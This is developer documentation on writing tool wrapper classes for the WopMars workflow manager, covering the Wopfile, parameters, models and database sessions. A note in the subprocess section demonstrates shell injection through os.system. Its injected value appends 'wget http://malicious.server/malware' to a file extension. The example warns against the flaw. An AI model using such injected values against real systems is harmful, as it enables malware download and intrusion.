The Tool Wrappers¶
This manual explains in simple terms how to write tool wrappers, so that a new Python developer can configure their own analysis workflow. It often refers to the Wopfile, so I recommend keeping the Wopfile section open in case you get lost.
This starting guide will help you understand the main mechanisms that drive WopMars, that is, how WopMars talks to the tool wrappers you are using in order to understand their role in the workflow in terms of inputs, outputs and parameters.
To illustrate the conditions required to build a correct Toolwrapper, we will work through a kind of to-do list so that no step is forgotten. The order doesn’t matter but, I insist, each step is essential.
Developing basic tool wrappers¶
Declaring your class¶
To define a Toolwrapper we will use an important concept of Object-Oriented Programming (OOP): inheritance from an abstract class.
Note
An abstract class is a class which represents a concept and which, consequently, is not supposed to be instantiated. Take the concept of a bird: a bird flies and sings, so an abstract class Bird would have methods like fly and sing with nothing inside. There is no species called “bird”; there are, however, ducks and eagles. A duck is a realization of the concept of “bird”. In OOP, the class Duck would inherit from Bird and would override the methods fly and sing to specialize them for the characteristics of a duck. Here, Duck is a subclass of Bird.
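The bird example can be written with Python's abc module. This is only a minimal sketch of the idea: Bird and Duck are the hypothetical classes from the note, and the return values are made up for illustration. Nothing here is part of WopMars.

```python
from abc import ABC, abstractmethod


class Bird(ABC):
    """Abstract concept: declares what every bird can do, without doing it."""

    @abstractmethod
    def fly(self):
        ...

    @abstractmethod
    def sing(self):
        ...


class Duck(Bird):
    """Concrete realization of the concept: overrides both methods."""

    def fly(self):
        return "flap flap"

    def sing(self):
        return "quack"


duck = Duck()
print(duck.fly(), duck.sing())

# The abstract class itself cannot be instantiated.
try:
    Bird()
except TypeError as error:
    print("cannot instantiate Bird:", error)
```

A subclass that forgets to override one of the abstract methods cannot be instantiated either, which is the kind of guarantee an abstract base class is meant to give.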
A Toolwrapper compatible with WopMars has to be a subclass of the abstract class called, prepare yourself, ToolWrapper! For WopMars, every tool wrapper is a subclass of ToolWrapper, and if you ask it to work with a class which does not satisfy this simple condition, you will get an error. The reason is simple: if your class inherits from ToolWrapper, it is certain to contain the methods and attributes WopMars relies on. Otherwise, there are no guarantees.
Another thing required to work with WopMars is the static class attribute __mapper_args__. This attribute is a dictionary which should have polymorphic_identity as key and the full name of the class (as a string) as value. WopMars needs this information because, when it stores information about the tool wrappers in the database, it uses it to keep track of the inheritance between your Toolwrapper and the ToolWrapper class.
Note
A static class attribute is an attribute associated with a class and not with a specific object of this class. Modifying this kind of attribute on the class changes it for every object of the class (those that already exist and those created later).
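Here is a small sketch of how class attributes behave in plain Python. The class Wrapper and its attribute registry_name are hypothetical names chosen for the illustration and have nothing to do with the WopMars API.

```python
class Wrapper:
    # Class attribute: stored on the class, shared by all instances.
    registry_name = "wrapper"


first = Wrapper()
second = Wrapper()

# Changing the attribute on the class is visible from every instance.
Wrapper.registry_name = "renamed"
print(first.registry_name, second.registry_name)

# Assigning through an instance creates an instance attribute that shadows
# the class attribute for that object only.
first.registry_name = "only-first"
print(first.registry_name, second.registry_name, Wrapper.registry_name)
```

This is why an attribute such as __mapper_args__ is declared in the class body rather than set on individual objects.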
Here is an example of the declaration of a class called SparePartsManufacturer:
from wopmars.models.ToolWrapper import ToolWrapper


class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }
    pass
You have now created your first Toolwrapper, but the point of inheriting from an abstract class is to guarantee to WopMars that each Toolwrapper implements the methods which describe its role.
Toolwrapper specifying methods¶
A good way to see a Toolwrapper is as an independent piece of software: it has a well-defined role, which is to generate a specific output from a specific kind of input, with some options to parametrize its behavior. In any case, this is how WopMars “sees” the tool wrappers. The link between a Toolwrapper and WopMars is made through methods inherited from ToolWrapper, which have to be overridden by the Toolwrapper developer.
Describing files: specify_input_file and specify_output_file¶
The input files are the files the tool needs in order to work, and the output files are the files it generates. A Toolwrapper doesn’t rely on a specific file on the machine: it shouldn’t access a file in a hard-coded way but should use a variable containing the path to the given file. It is up to the Toolwrapper developer to choose those variable names, and they have to be respected in the workflow definition file (see Wopfile section). WopMars learns those variable names through the methods specify_input_file (for the variable names associated with inputs) and specify_output_file (for the variable names associated with outputs). Each of those methods has to return a list of strings containing the variable names accepted by the Toolwrapper.
Warning
Every file requested by a Toolwrapper is required: the Toolwrapper relies on every input and output it declares. If a file is optional, you should declare it in the method specify_params (we will see it later).
The class SparePartsManufacturer takes a file as input but doesn’t produce any output file. The input file path will be stored under the variable name “pieces”.
class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_file(self):
        return ["pieces"]
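To make this contract concrete, here is a minimal sketch of the kind of check a workflow engine could run against these declarations. The class StubWrapper and the function missing_and_unknown are hypothetical and only illustrate the idea; this is not how WopMars itself is implemented.

```python
class StubWrapper:
    """Hypothetical stand-in for a tool wrapper (not the WopMars base class)."""

    def specify_input_file(self):
        return ["pieces"]


def missing_and_unknown(declared, given):
    """Compare the declared variable names with those found in a rule."""
    declared, given = set(declared), set(given)
    return sorted(declared - given), sorted(given - declared)


# Names written under `input: file:` in a rule of the definition file.
rule_input_files = {"pieces": "input/pieces.txt"}

missing, unknown = missing_and_unknown(
    StubWrapper().specify_input_file(), rule_input_files
)
print("missing:", missing, "unknown:", unknown)
```

Since every declared file is required, a non-empty list on either side would mean that the rule and the wrapper disagree about the variable names.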
Describing tables: specify_input_table and specify_output_table¶
WopMars lets its tool wrappers read and write entries in a database. As with files, the tool wrappers have to specify which tables of the database they will read (input tables) and which they will write (output tables). To do so, the ToolWrapper class provides the methods specify_input_table and specify_output_table. This time, however, the strings contained in the returned list are associated with both the variables containing the table models and the names of the tables themselves.
The final user has to write the same table names as keys in the table part of the definition file (see Wopfile section), with the path to the model associated with each table as value, to specify which model the Toolwrapper should use. Usually, a Toolwrapper is closely tied to a specific model, but if two models are similar from the point of view of a given Toolwrapper, it could use either of them interchangeably (for example, if a model B inherits from the model A, then every Toolwrapper able to use A should be able to use B too).
Note
At this point the concept of model may not be clear yet, but don’t worry: the section about models explains it in more detail. For now, simply note that the Toolwrapper communicates its input and output table names through the methods specify_input_table and specify_output_table.
Here is the rest of the Toolwrapper SparePartsManufacturer, which writes its results in the table piece:
class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_file(self):
        return ["pieces"]

    def specify_output_table(self):
        return ["piece"]
Describing parameters: specify_params¶
Another feature of tool wrappers is that they let you specify parameters for the processing done by the wrapper. Usually, those parameters correspond to the options of the analysis tool itself. They may also correspond to options used by the tool wrapper to offer flexibility in the pre- and post-processing of the data.
To specify which options a Toolwrapper understands, it implements the method specify_params. This method returns a dictionary in which each key is the name of an option, as used in the definition file (see Wopfile section), and each value is a string representing its type. The available types are the following (to memorize them, just think of the Python data types):
- int
- float
- str
- bool
Furthermore, the keyword required is available to specify that an option has to be given by the user for the tool to run. To specify the type and use required at the same time, the character | is used as a delimiter inside the string.
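As an illustration of this convention, here is a minimal sketch of how such specification strings could be parsed and applied. The names CASTERS, parse_spec and validate are hypothetical helpers written for this example, not WopMars functions. The sketch accepts required on either side of the delimiter, and the way a bool is read from text is also an assumption.

```python
# Hypothetical helper: maps the type names listed above to Python callables.
CASTERS = {
    "int": int,
    "float": float,
    "str": str,
    # Assumption: these spellings count as true, anything else as false.
    "bool": lambda raw: str(raw).strip().lower() in ("true", "1", "yes"),
}


def parse_spec(spec):
    """Split a spec such as "required|int" into (is_required, type_name)."""
    tokens = [token.strip() for token in spec.split("|")]
    is_required = "required" in tokens
    type_names = [token for token in tokens if token != "required"]
    if len(type_names) != 1 or type_names[0] not in CASTERS:
        raise ValueError(f"invalid parameter spec: {spec!r}")
    return is_required, type_names[0]


def validate(specs, given):
    """Check user-supplied values against the specs and cast them."""
    result = {}
    for name, spec in specs.items():
        is_required, type_name = parse_spec(spec)
        if name not in given:
            if is_required:
                raise ValueError(f"missing required parameter: {name}")
            continue
        result[name] = CASTERS[type_name](given[name])
    return result


print(validate({"max_price": "required|int", "to_file": "bool"},
               {"max_price": "2000"}))
```

With these helpers, an optional parameter that is not given is simply absent from the result, while a missing required parameter raises an error before any processing starts.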
In the following class, the parameter max_price is an int and, if set, is used to keep only the entries with a price lower than it.
class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_file(self):
        return ["pieces"]

    def specify_output_table(self):
        return ["piece"]

    def specify_params(self):
        # The type is given as a string, as described above
        return {
            "max_price": "int"
        }
Declaring the method run¶
The run method contains the core of your Toolwrapper. The data processing and the call to the underlying analysis tool are done here.
Calling files: self.input_file and self.output_file¶
The paths to the files given by the final user are accessed through the methods self.input_file and self.output_file, with the name of the variable containing the desired file as argument. For example, in our definition file, we have:
rule Rule1:
    tool: 'wrapper.SparePartsManufacturer'
    input:
        file:
            pieces: 'input/pieces.txt'
We can access the string input/pieces.txt with the following statement:
self.input_file("pieces")
Calling models: self.input_table and self.output_table¶
The models given by the user can be accessed through the methods self.input_table and self.output_table, with the table name as argument. This time, unlike with files, you won’t get a string representing the model but the model itself. For example:
    output:
        table:
            piece: 'model.Piece'
We can access the model Piece with the following statement:
self.output_table("piece")
Session and accessing the database¶
If you are using WopMars, it is probably for the database access. You now know how to call the models from your run method, but you probably don’t know what to do with them yet. This section explains how you should use your models and a session to access the database.
Note
When you are working with a database, the work you perform on it is organized in three hierarchical levels: the session, the transaction and the operation:
- The operation corresponds to each single task you ask the database to do (SELECT, INSERT, UPDATE, DELETE, etc.).
- The transaction is a series of closely related operations (for example: SELECT, compute, then INSERT). When a transaction finishes, the state of the database is checked: if everything is consistent, the transaction is validated (COMMIT); if not, the whole transaction is cancelled (ROLLBACK) in order to return to a stable state.
- The session is a series of independent transactions. In other words, when you want to work with the database, you open a session, which says “I’m going to work with you, database, are you OK?”. Then, every operation you perform is associated with your session before being committed or rolled back.
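The difference between COMMIT and ROLLBACK can be tried out with Python's built-in sqlite3 module. This is a sketch outside WopMars: the in-memory database, the piece table and its serial and price columns are made up for the example, and the sqlite3 connection loosely plays the role of the session.

```python
import sqlite3

# An in-memory SQLite database stands in for the workflow database.
connection = sqlite3.connect(":memory:")
connection.execute("CREATE TABLE piece (serial TEXT PRIMARY KEY, price INTEGER)")
connection.commit()

# First transaction: two operations validated together with COMMIT.
connection.execute("INSERT INTO piece VALUES ('A1', 100)")
connection.execute("INSERT INTO piece VALUES ('B2', 250)")
connection.commit()

# Second transaction: the second operation violates the primary key,
# so the whole transaction is cancelled with ROLLBACK.
try:
    connection.execute("INSERT INTO piece VALUES ('C3', 80)")
    connection.execute("INSERT INTO piece VALUES ('A1', 999)")
    connection.commit()
except sqlite3.IntegrityError:
    connection.rollback()

rows = connection.execute("SELECT serial FROM piece ORDER BY serial").fetchall()
print(rows)
```

The row C3 does not appear in the result: it belonged to the transaction that was rolled back, even though its own INSERT was valid.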
Developing Advanced tool wrappers¶
Now that you understand the basics of the development of the tool wrappers you may want to do more advanced tricks to deal with WopMars.
Parametrize inputs and outputs¶
During the parsing of the configuration file, WopMars first checks the validity of the parameters and then looks at the inputs and outputs. This behavior allows you to make the inputs and outputs of your Toolwrapper depend on the parameters used. In this example, the parameter to_file is a boolean and, if it is True, the result is written to a file instead of the database.
class CarAssembler(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_output_file(self):
        if not self.option("to_file"):
            return []
        else:
            return ["piece_car"]

    def specify_input_table(self):
        return ["piece"]

    def specify_output_table(self):
        if self.option("to_file"):
            return []
        else:
            return ["piece_car"]

    def specify_params(self):
        return {
            "to_file": "bool",
            "max_price": "int",
        }
And here is what the definition file (Wopfile2.yml in the example directory) looks like:
# Rule1 uses SparePartsManufacturer to insert piece information into the table piece
rule Rule1:
    tool: 'wrapper.SparePartsManufacturer'
    input:
        file:
            pieces: 'input/pieces.txt'
    output:
        table:
            piece: 'model.Piece'

# CarAssembler makes all possible combinations of pieces to build cars and calculates the final price
rule Rule2:
    tool: 'wrapper.CarAssembler'
    input:
        table:
            piece: 'model.Piece'
    output:
        # Here the output is written in a file
        file:
            piece_car: 'output/piece_car.txt'
    params:
        # The price has to be under 2000!
        max_price: 2000
        to_file: True
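To see the effect of the parameter without running a workflow, here is a small sketch that uses a stand-in base class. StubToolWrapper is hypothetical: it only mimics the option method used above, and it assumes that an option which was not given reads as None. The real base class is the one provided by WopMars.

```python
class StubToolWrapper:
    """Hypothetical stand-in for the WopMars base class, for illustration."""

    def __init__(self, options):
        self._options = options

    def option(self, name):
        # Assumption: an option that was not given reads as None.
        return self._options.get(name)


class CarAssembler(StubToolWrapper):
    def specify_output_file(self):
        return ["piece_car"] if self.option("to_file") else []

    def specify_output_table(self):
        return [] if self.option("to_file") else ["piece_car"]


for options in ({"to_file": True, "max_price": 2000}, {"max_price": 2000}):
    wrapper = CarAssembler(options)
    print(options, wrapper.specify_output_file(), wrapper.specify_output_table())
```

In both cases exactly one of the two lists contains piece_car, so the rule always declares one output, either a file or a table.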
Inherit models¶
When designing your workflows, you may want several rules to write to the same table in a specific order (for example, one rule creates the entries and another fills in additional fields). Normally you would do as usual, playing with inputs and outputs to fit your needs, but here you will run into a logic problem: WopMars won’t be able to tell that “this rule should be run before that one”, as in the following schema:

If you want the rules to be run in this specific order, WopMars can’t understand if `rule 2` is supposed to run before `rule 4` on the basis of the table names
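The ambiguity can be reproduced with a toy dependency graph. This sketch is not how WopMars builds its execution graph: the rule names are invented, and the only assumption is that a rule depends on every other rule writing a table it reads. It needs Python 3.9 or later for the graphlib module.

```python
from graphlib import CycleError, TopologicalSorter

# Hypothetical rules: name -> (tables read, tables written).
rules = {
    "create_pieces": (set(), {"piece"}),
    "add_dates": ({"piece"}, {"piece"}),
    "add_prices": ({"piece"}, {"piece"}),
}

# A rule depends on every other rule that writes a table it reads.
dependencies = {
    name: {
        other
        for other, (_, written) in rules.items()
        if other != name and reads & written
    }
    for name, (reads, _) in rules.items()
}

try:
    order = list(TopologicalSorter(dependencies).static_order())
except CycleError:
    # add_dates and add_prices each depend on the other: no valid order.
    order = None

print(dependencies)
print("execution order:", order)
```

Judging by table names alone, the two rules that both read and write piece depend on each other, so no execution order can be derived.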
You can work around this issue with model inheritance: you can build a model which inherits from an existing model and adds new attributes to it.
Taking our example model Piece again, we need another model which adds the field date to the table. We call this model DatedPiece:
from sqlalchemy.sql.sqltypes import Date
from sqlalchemy import Column

from model.Piece import Piece


class DatedPiece(Piece):
    date = Column(Date)
With this model, another Toolwrapper is provided in the example: AddDateToPiece, which shows the use of the same table as input and output. Note that only output_table is used here, since we are only interested in DatedPiece objects:
import datetime
import random
import time

from wopmars.framework.bdd.tables.ToolWrapper import ToolWrapper


class AddDateToPiece(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_table(self):
        return ["piece"]

    def specify_output_table(self):
        return ["piece"]

    def run(self):
        session = self.session
        DatedPiece = self.output_table("piece")
        for p in session.query(DatedPiece).all():
            # Give each piece a random date in the past
            date = datetime.datetime.fromtimestamp(time.time() - random.randint(1000000, 100000000))
            p.date = date
            session.add(p)
        session.commit()
Executing clean command line¶
While learning Python, you may have come across the famous os.system("command-line") and you probably want to use it again. Sorry, you shouldn’t do things this way, especially if you are running long analysis software. Instead, I’ll show you how to use the subprocess module for simple things; please use it extensively in order to get more control over the command lines you are executing.
Note
As far as I know, there are two main differences between os.system() and subprocess, besides the fact that subprocess is a little more difficult to use:
- os.system() is very sensitive to malicious code injection. Example:
def list_extension(ext):
    os.system("ls -1 *." + str(ext))
This function is supposed to list all the files with a given extension in the directory. But if, instead of passing txt as argument, I pass txt; wget http://malicious.server/malware then the function will list the files with the txt extension and download the malware from the malicious server! With subprocess.Popen and a list of arguments, you can’t do such a thing, because no shell is involved: each element of the list is passed to the program as a single argument, whatever characters it contains:
def list_extension(ext):
    subprocess.Popen(["ls", "-1", "*." + str(ext)])
Note that, for the same reason, the wildcard * is not expanded either; in real code the file names would be collected in Python, for example with the glob module.
- subprocess opens a pipe between the Python process and the subprocess, whereas os.system calls an independent subshell. This difference makes the communication between the subprocess and your Python code far easier with subprocess than with os.system, where it is nearly impossible.
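Here is a minimal sketch of calling a program with subprocess.run and a list of arguments. The function run_tool is a hypothetical helper written for this example, and the Python interpreter itself stands in for an analysis tool so that the example runs on any machine.

```python
import subprocess
import sys


def run_tool(arguments):
    """Run a command given as a list of arguments and return its output."""
    completed = subprocess.run(
        arguments,
        capture_output=True,  # collect stdout and stderr through pipes
        text=True,            # decode the output from bytes to str
        check=True,           # raise CalledProcessError on a non-zero exit code
    )
    return completed.stdout


# The hostile-looking value is passed verbatim as one single argument:
# no shell is involved, so "; wget ..." is never interpreted as a command.
hostile = "txt; wget http://malicious.server/malware"
output = run_tool(
    [sys.executable, "-c", "import sys; print(sys.argv[1:])", hostile]
)
print(output)
```

The child process simply prints the argument it received, which shows that the whole string arrived as a single value. With check=True, a failing tool raises an exception instead of being silently ignored, which is useful for long-running analyses.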
Reading/writing to the database¶
Reading and writing to the database has to be carried out through the WopMars session. The WopMars session implements a lock system to prevent database inconsistencies. There are three ways to read from and write to the database with the WopMars session:
- SQLAlchemy ORM
- SQLAlchemy core
- Pandas read_sql and to_sql
SQLAlchemy ORM¶
The SQLAlchemy ORM is very simple, but it also becomes quite slow beyond about 100 objects. Inside the run method of the tool wrapper, we can get a WopMars session simply with self.session and then call SQLAlchemy ORM methods on it.
# This code is for illustration purposes and has not been tested
from sqlalchemy.orm.exc import NoResultFound

# inside the run of a tool wrapper MyWrapper
def run(self):
    session = self.session
    my_input_model = self.output_table(MyWrapper.__input_table1)
    # value_1 and value_2 are placeholders for the values to store
    query_dic = {'col1': value_1, 'col2': value_2}
    try:
        # check if an entry matching query_dic exists
        session.query(my_input_model).filter_by(**query_dic).one()
    except NoResultFound:
        # if not, add it; it is committed below
        session.add(my_input_model(**query_dic))
    session.commit()
SQLAlchemy core¶
Inside the run method of the tool wrapper, we first retrieve from the database a list of dictionaries describing the existing objects. We then check that the new objects are not already in the database, and finally insert the list of new object dictionaries in a single statement.
# This code is for illustration purposes and has not been tested
from sqlalchemy import select

# inside the run of a tool wrapper MyWrapper
def run(self):
    session = self.session
    engine = session._WopMarsSession__session.bind
    conn = engine.connect()
    my_input_model = self.output_table(MyWrapper.__input_table1)
    # retrieve all objects in database
    sql = select([my_input_model.col1])
    my_input_model_in_db = [{'col1': row[0]} for row in conn.execute(sql)]
    # list of value dics to insert; val1 is a placeholder for the new value
    my_input_model_new_objects = []
    # check if new col1:val1 not already in db
    if {'col1': val1} not in my_input_model_in_db:
        my_input_model_new_objects.append({'col1': val1})
    # bulk insert the list of value dics, if any
    if my_input_model_new_objects:
        engine.execute(my_input_model.__table__.insert(), my_input_model_new_objects)
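The same pattern (read the existing values, filter the candidates, insert the remaining ones in one call) can be tried outside WopMars. The sketch below deliberately uses the standard sqlite3 module in place of SQLAlchemy core and does not go through the WopMars session. The piece table, its serial column and the sample values are made up for the example.

```python
import sqlite3

connection = sqlite3.connect(":memory:")
connection.execute("CREATE TABLE piece (serial TEXT PRIMARY KEY)")
connection.executemany(
    "INSERT INTO piece (serial) VALUES (:serial)",
    [{"serial": "A1"}, {"serial": "B2"}],
)
connection.commit()

# Retrieve the values already stored, as a set for fast membership tests.
existing = {row[0] for row in connection.execute("SELECT serial FROM piece")}

# Keep only the candidate dictionaries that are not in the database yet.
candidates = [{"serial": "B2"}, {"serial": "C3"}, {"serial": "D4"}]
new_rows = [row for row in candidates if row["serial"] not in existing]

# Insert all new rows in one call instead of one statement per object.
if new_rows:
    connection.executemany(
        "INSERT INTO piece (serial) VALUES (:serial)", new_rows
    )
    connection.commit()

stored = connection.execute("SELECT serial FROM piece ORDER BY serial").fetchall()
print(stored)
```

Collecting the existing values in a set keeps the membership test cheap when the number of candidates grows, which is the situation where the bulk approach pays off compared with handling objects one by one.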